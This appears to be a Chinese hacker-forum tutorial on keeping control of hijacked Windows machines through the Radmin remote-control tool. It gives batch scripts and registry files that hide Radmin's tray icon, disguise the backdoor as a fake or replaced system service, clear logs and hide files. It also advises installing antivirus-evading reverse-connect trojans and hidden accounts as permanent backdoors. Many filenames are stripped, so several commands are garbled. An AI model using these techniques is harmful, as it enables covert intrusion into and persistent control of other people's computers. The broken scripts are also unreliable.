RAdmin 服務端高級配置

對于4899肉雞,相信大家都不會陌生吧。radmin遠程控制軟件最大的優點就是功能齊全，便于操作，能夠

躲避一些軟件的查殺。實在是居家旅行，殺人滅口，絕好武器。那么……有的朋友要問了多么好的寶馬良

駒在哪里可以找到啊？問的好，各大黑客均能下載，童叟無欺啊！（這段對白怎么這么耳熟啊？）

第一章 4899空口令肉雞爭奪戰

4899空口令肉雞是由一些超級菜鳥們用Windows NT/2000 自動攻擊探測機對他感興趣的某段IP細心的，

無微不至的掃描孕育而生的~~~(鼓掌,有請我們今天的主角,4899空口令肉雞隆重登場,哎呀,誰拿西紅柿扔我?

忒不講公德呢?扔也不扔個紅的，綠的怎么吃啊?)

既然4899空口令肉雞這個多，那么偶就先從它的由來說起吧！Windows NT/2000 自動攻擊探測機這款掃

描軟件不但集成了掃描器的特點，還添加了一些漏洞的利用功能。它能夠對掃描出IIS溢出的，弱口令的

和SA空口令的電腦上傳并安裝遠程圖形控制軟件Radmin，即把R_，和這

三個文件上傳到其電腦系統跟目錄%systemroot%system32子目錄下，并行運行R_可執行文件。

由于遠程上傳的Radmin沒有經過配置，因此在對方機子的任務欄里出現了Radmin服務程序的托盤(如圖

1-1)。這樣不就成個此地無銀三百兩，機器的主人一定能發現這個不正常的托盤。我想他第一個動作就是

把鼠標移動到托盤位置，一點就顯示出了有某某IP正在連接本機。如果是個只知道上網聊天的MM她第

一個動作就是把網斷了，逃過別人的控制再說。如果是個有經驗的老鳥那么各位就要小心了，他會通過顯

示出的IP查到你的電腦或者你用來掃描的肉雞，這樣就大大的不妙了。所以了，這個托盤的隱藏是非常必

要和急切的。

在做我們的工作之前，要做好一些準備活動。首先把4899空口令肉雞設置上密碼，在Radmin的CMD控

件下輸入命令r_ /port:520 /pass:hackba /save /silence。有些同僚總是抱怨這個命令不好用，我看

過他們出問題的動畫。無論是在CMD命令下或者在“運行”下輸入這個命令都是正確的，而他們出錯的原

因就是沒有添加參數“/save”保存，和參數“/silence”后臺安裝。這樣設置好連接端口和密碼，同道中人就算

用“4899空口令掃描器”掃到你做的肉雞也晚了，偶已經添加過密碼了，而端口在肉雞重起后能夠修改成功。

接下來我們就要把一個反彈木馬放到肉雞上，以免對方是動態IP，肉雞就飛掉了。這里我們可以用灰鴿子

VIP或黑洞2004這兩個反彈木馬都很不錯的哦~~~。順便說一句您的木馬一定要做過特征碼修改或者加殼

啊，這樣能夠躲避對方殺毒軟件的查殺。在這里再說句題外話對木馬加殼不是加的殼越多就越安全的，這

樣大家就走入了多加殼的誤區。這樣不但不能躲過殺毒軟件的查殺，還有可能使木馬的功能受到影響。對

喜歡加殼躲殺毒軟件的朋友偶建議下先把木馬脫殼，然后再加個不知名的殼（ASPack, UPX這些加殼軟件

的殼已經被有些殺毒軟件列入黑客程序列表了），然后在用幾款世面流行的殺毒軟件在本地機器事先做個放

殺毒檢測。

這樣的黑客程序才是我們的殺手锏。

前期工作制作完畢后，您就可以耐心的工作了。為了做到隱藏托盤的目的，偶想了兩個辦法：

第一， 在您的機器上事先安裝并配置好Radmin，把注冊表中的

HKEY_LOCAL_MACHINESYSTEMRAdmin導出為，這個就是絕對符合您意愿的Radmin配置，

把上傳到對方機器輸入命令regedit /s 。這樣在機器重起或者您幫助他重起Radmin服

務的時候，任務欄里的Radmin托盤就消失了。

第二， 寫個批處理文件重新調整Radmin配置。批處理文件內容如下：

echo off

r_ /port:520 /pass:hackba /save /silence

echo Windows Registry Editor Version 5.00 >

echo [HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters] >>

echo "DisableTrayIcon"=hex:01,00,00,00 >>

regedit /s

1 / 7

del

到這里菜鳥的“保雞”反擊戰已經告一段落。剛才我們不是還放了個灰鴿子嗎，這樣這臺肉雞上就有我們的

兩匹寶馬良駒了。小樣讓你跑，還是逃不出如來佛的掌心吧！呵呵，我得意的笑~~~

在長期的摸索研究工作中，偶發現個Windows NT/2000 自動攻擊探測機的小BUG。等偶慢慢道來，各位

看官聽仔細啊。Radmin 3.0影子版的客戶端是Radmin公司開發的，而服務端程序缺因為種種原因，沒有和

各位見面。有的說是Radmin公司在開發新的功能，服務端沒有開發完；有的說Radmin公司現在只對付費

用戶提供服務端，這些偶就不得而知了。可是我們敬愛的影子為我們制造出了“Radmin 3.0服務端”其本質

就是2.0版本的部分修改，對其圖標做了修改和加殼處理。可是在漢化過程中，不知道什么原因，它在任

務欄里的Radmin托盤變成了一個空白的地方，要是不注意是看不出來的（如圖1-2、1-3）。所以了，我們

在運行Windows NT/2000 自動攻擊探測機掃描機子的時候，把它同目錄下釋放出來的R_，替換

成3.0版本的R_。這樣掃描出來上傳圖形控制軟件的機器，在其任務欄里就出現了一個空白的地

方。當把鼠標點到上面的時候也沒有了某某IP正在連接的提示，這樣就欺騙了一些機主。呵呵，旁門左道

大家不要見笑啊。可是這個小BUG啟發了我的另一個思路，就是把我們的自動運行的配置包

重命名為R_，然后替換掉R_，我們不就有了所以自己的機子了嗎？好，說干就干。把

我的Radmin自解壓包替換掉R_，可是這回Windows NT/2000 自動攻擊探測機就沒有了上傳成

功的小提示。（如圖：1-4）（廣告過后更精彩）我一直對這個驗證方法不甚了解，想找作者問問，可是他老

人家還換QQ了。哪位高手有高見，請不吝賜教，偶的QQ：9500142。言歸正傳，那也難不倒我，我們把

掃描出來有漏洞的所有IP復制到一個文本文件中，用superscan導入IP列表，掃描我設置Radmin服務的

端口，這樣被我上傳Radmin的機器就都上門報道了。Yeah!（如圖：1-5）

第二章 Radmin 服務端高級配置

既然我們對Radmin這么情有獨鐘，那么我們就要打造不死系的超級后門木馬。具推斷當前安裝過Radmin

控制軟件的肉雞占安全性低級的電腦的80%左右，所以我們上傳木馬之前，要把其系統中可能存在的

Radmin服務停止掉，替換成我們的服務為己所用。絕大部分的安裝Radmin的肉雞都是用的R_

程序。可是種植的原始情況分為兩種：

第一 就如上面所說那樣，是用Windows NT/2000 自動攻擊探測機上傳安裝的，其安裝服務的名稱為

“radmm”。啟動和停止該服務的命令分別為“net start radmm”和“net stop radmm”。

第二一些喜歡偷懶的朋友，把自己的Radmin是默認的R_程序，其安裝服務的名稱為“Remote

Administrator Service”。啟動和停止該服務的命令分別為“net start r_rver”和“net stop r_rver”。

偶發現一個對付這兩種配置的小竅門，就是可以用“r_ /start”和“r_ /stop”啟動和停止服務，

然后我們在替換為自己的配置。

Follow Me！

對配置Radmin自解壓程序的，我有兩個思路可供大家參詳，希望對您能配置能夠有所啟發和幫助.

第一就是替換系統服務的方法。如果您對Windows系統服務的工作機理不甚了解，那么請跳過這里，看接

下來的第二種配置.

1、編寫一個批處理文件，命名為

--------------------------------------------

echo off

r_ /stop

--------------------------------------------

這樣做是假定肉雞上已經由黑友安裝過Radmin服務，殺無赦。

2、接下來我拿系統的ClipBook服務開刀做下替換。編寫一個批處理文件，命名為

--------------------------------------------

2 / 7

echo off

sc stop ClipBook

sc delete ClipBook

sc stop r_rver

del %systemroot%

del %systemroot%

del %systemroot%system32R_

del %systemroot%

del %systemroot%

copy %systemroot%

%systemroot%

copy %systemroot%

%systemroot%

copy %systemroot%

%systemroot%

/install /silence

regedit /s

regedit /s

sc config ClipBook start=auto

sc start ClipBook

sc delete r_rver

del

del

del

cls

del

-f -r

del

del

del

del

--------------------------------------------

注冊表文件時服務配置,Sc是微軟服務修改程序(比爾其實對我們還滿不錯的哦，嘿嘿)，

是日志清除工具(大家要養成勤掃地的習慣噢！)，是關機程序,這個程序無關緊要，關鍵看您

的性子怎么樣了（急性子的黑友建議使用）。就是ClipBook服務的描述信息了，要偽裝當然要做

的夠專業啊。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesClipSrv]

3 / 7

"Description"="啟用“剪貼簿查看器”儲存信息并與遠程計算機共享。如果此服務終止，“剪貼簿查看器” 將

無法與遠程計算機共享信息。如果此服務被禁用，任何依賴它的服務將無法啟動。"

"DisplayName"="ClipBook"

上面的信息是由原ClipBook服務所對應的注冊表鍵值

[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesClipSrv] 提取出來的。

因為分支包含了部分電腦路徑和安全信息，每個電腦都有些許區別，所以把精煉的東西提取出來做為我們

的偽裝信息。

然后，把我們所用到的工具、注冊表文件、批處理文件打包。配置RAR高級自解壓格式所選項嘀時候，

注意那個解壓路徑寫成%systemroot%system32Setup這個目錄

步驟1 選擇『在當前文件夾中創建』

步驟2 在『解壓后運行』輸入

步驟3 在『解壓前運行』輸入

步驟4 選擇RAR高級自解壓縮選項中的『模式』改兩個地方，選擇『全部隱藏』和『覆蓋所有文件』。命

名自解壓縮程序命為

第二就是添加一個完全屬于偶嘀服務的方法。

1、編寫一個批處理文件，命名為

--------------------------------------------

echo off

r_ /stop

--------------------------------------------

呵呵，安全第一。

2、接下來偶為我親愛的小馬創建個服務。

服務名稱：wmipd

顯示名稱：Windows Management Instrumentation Player Drivers

編寫一個批處理文件，命名為

--------------------------------------------

echo off

sc stop r_rver

del %systemroot%

del %systemroot%

del %systemroot%system32R_

/install /silence

regedit /s

net start wmsrv

attrib +r +h %systemroot%

attrib +r +h %systemroot%

attrib +r +h %systemroot%

regedit /s

sc config Windows Management Instrumentation Player Drivers start=auto

sc start Windows Management Instrumentation Player Drivers

sc delete r_rver

4 / 7

del

del

del

cls

del

del

del

--------------------------------------------

注冊表文件時服務配置,Sc是微軟服務修改程序，是日志清除工具。就是

Windows Management Instrumentation Player Drivers服務的描述信息了，要偽裝當然要做的夠專業啊。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswmipd]

"Description"="為Windows Media Player提供加載進程及為其他的移動媒體，驅動程序和庫提供基層安全協

議服務。"

"DisplayName"="Windows Management Instrumentation Player Drivers"

然后，把我們所用到的工具、注冊表文件、批處理文件打包。配置RAR高級自解壓格式所選項嘀時候，注

意那個解壓路徑寫成%systemroot%system32drivers這個目錄

步驟1 選擇『在當前文件夾中創建』

步驟2 在『解壓后運行』輸入

步驟3 在『解壓前運行』輸入

步驟4 選擇RAR高級自解壓縮選項中的『模式』改兩個地方，選擇『全部隱藏』和『覆蓋所有文件』。命

名自解壓縮程序命為

如果在Radmin服務已經安裝的前提下，還可以用把它的服務信息修改了，在這里我就不做演示了，

大家動手做做~~~

優點：

1.在系統服務中看見的是Windows Management Instrumentation Player Drivers服務

（可以自定義）

2.服務說明是 為Windows Media Player提供加載進程及為其他的移動媒體，驅動程序和庫提供基層安全協

議服務

3.在cmd命令提示符下面，使用net start命令看見的是自啟動服務是

Windows Management Instrumentation Player Drivers

4.在進程中看見的是wmsrv（可以自定義，在文件中相應的位置改一下，注意不要和已有的系統進

程起沖突）

第三章 Radmin的訪問權限的設置

設置恰當Radmin的訪問權限，能夠更好的方便在線教學工作的開展，還可以讓高手幫

您設置一些東西和遠程維護系統，又不會擔心別人窺探您的隱私或給下個木馬類的好東東。

5 / 7

（呵呵~~~~偶不是貶低高手的道德噢，請高手們別生氣~~~）

設置Radmin的訪問權限的，首先要設置一個登陸用的XXnet ur hackba neugirl /add

用戶所屬組為ur，這個權限已經夠用了。

輸入r_ /tup命令調出Radmin服務端設置程序

步驟1 選擇『設置參數』，其他參數的配置我在這就不多說了。現在我們關鍵講述下『連接確定』的設置

① 如果是做在線教學工作或遠程協助，在這里選擇『使用用戶許可』---『連接超時自動拒絕』超時時間，

設置的長點。這里我設置為30秒。（如圖：3-1）

② 如果您要是在肉雞上建立的用戶，使用遠程操作，那么『連接確定』就不要設置了。免得跳出個要求

連接的對話框把管理員嚇壞了，這樣就不好了。

步驟2 選擇『設置密碼』---『使用NT用戶安全驗證』，激活『確定使用』，然后點擊『許可』---『添加』。

然后會彈出一個『Add ur/group』的會話框，點擊左下角的『顯示用戶』，這樣電腦中的所有組和用戶都

顯示出來了。選中偶剛才新建的hackbaXX，添加到右邊的會話框中，在右上角的『存取權利』中選中您

希望為hackba該用戶開啟的訪問權限。（如圖：3-2）

具體權限分配：

Special access 特殊權限

All access(RTVFC) 所有權限

Full control of screen 完全控制

File transfer 文件傳送

View of screen 查看屏幕

Telnet Telnet連接

Redirect 重定向（這個功能偶一直沒有找到是控制什么的，請高手賜教）

No access 無權限

然后一路點OK，回到Radmin服務端設置程序后點擊『安裝程序』，等到安裝通知提示“服務安裝完成”后，

在CMD命令提示符下輸入命令net start r_rver啟動服務。

步驟3 樣您在客戶端連接服務端電腦的時候就彈出『輸入NT用戶』的對話框，在這里我填寫的是用戶名：

hackba 密碼：neugirl 所屬域（這個可以不填寫）（如圖：3-3）

其中Redirect 重定向這個控制什么，偶一直沒有弄明白。請請高手賜教。經過妹妹偶做過大量試驗證實：

Radmin的訪問權限的設置適合于Windows 2000和Windows 2003系列各個版本上使用，對于Windows XP

系統Radmin的2.1和3.2版本都不支持。不知為何原因，希望高手能夠指點。如果想對遠程主機做Radmin

的訪問權限配置只要在本地主機事先建立一個XX，然后分配所希望開放的權限，點擊『安裝程序』，然后

在注冊表[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerUrs]分支中就會出現您分配過權限的

XX名，在它的鍵值中有該用戶所屬域的“組”及“Radmin控制權限”，把這個注冊表文件導入到遠程主機中，

然后在其電腦中建立了同用戶名的賬號，這樣就全部搞定了。

有興趣的朋友還可以建個隱藏賬號作為我們的永久后門！

后記：下面還有一個我寫的批處理文件，是用來定時運行Radmin程序的，雖然微軟公司的系統維護工具

soon和sleep都能夠定時運行程序，可使用自己寫的批處理文件能夠達到目的，也是很欣慰的。嘿嘿

這里說明下批處理文件編寫的思路：首先查詢本機的當前時間，當然把批處理文件放到肉雞上就能查肉雞

的時間了。然后把讀取的時間暫時存儲在內存中，把時間函數拆分為“小時”和“分鐘”兩部分，付值到tokens

6 / 7

調用的兩個函數中。在t /a mm=%mm%+2一句中添加上你希望延長多久再運行程序。

echo off

color 0A

cls

Rem ===============以下是的內容=================

echo off

echo 正在查詢本機的當前時間

echo.

net time 127.0.0.1 /t /y

for /f "tokens=1,2 delims=:" %%i in ("%time%") do t /a hh=%%i & t /a mm=%%j

echo %1當前時間為%hh%:%mm%

t /a mm=%mm%+2

if /i %mm% geq 60 t /a mm=0 & t /a hh=%hh%+1

if /i %hh% geq 24 t /a hh=0

t tm=%hh%:%mm%

echo.

echo 設置啟動AT命令運行的時間為%tm%

echo.

at 127.0.0.1 %tm% net stop r_rver

Rem ========================完=============================

echo ======================================================

echo 魔女の條件---Radmin自啟動程序

echo 黑客基地 .hackba.

echo ======================================================

echo 最多再過120秒，Radmin服務就會被啟動，請稍侯...

echo 請明智地使用，否則可能導致民事或刑事處罰!

echo 歡迎到黑客基地論壇發表高見或者用QQ聯系偶!

echo

echo 所有:魔女の條件

echo QICQ:9500142

echo :luciferhackba.

echo ------------------------------------------------------

在配置Radmin服務端的時候除了對程序的免查殺處理，還有對其程序圖標作下修改，建議使用劍鷹文件

合并器或用灰鴿子圖標修改器修改成微軟系統內部圖標。對于Radmin啟動隱藏請參見《黑客X檔案》第

九期《Radmin之自啟動》，風寫的這個自啟動方法很有見地。

7 / 7